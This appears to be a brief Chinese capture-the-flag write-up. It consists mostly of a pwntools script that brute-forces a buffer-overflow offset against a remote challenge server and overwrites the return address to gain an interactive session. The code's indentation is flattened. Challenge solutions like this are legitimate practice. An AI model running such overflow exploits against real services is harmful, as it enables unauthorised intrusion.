题目并没有提供二进制文件进行分析,采用暴力破解方式
from pwn import * import threading
#context(os='linux', arch='i386', log_level='debug')
def find():
print("thread %s is running..."%threading.current_thread().name)
n=0x0
while n<0x400:
n=n+1
print("thread %s>>>%s"%(threading.current_thread().name,n))
sh=remote("220.249.52.134",53525)
payload=p8(0x11)*n+p64(0x4006b0)
sh.sendlineafter(">",payload)
try:
sh.recvline()
print("repeat time is %x"%n)
sh.interactive()
break
except EOFError:
continue
if __name__ =='__main__':
t1=threading.Thread(target=find)
t1.start()
t1.join()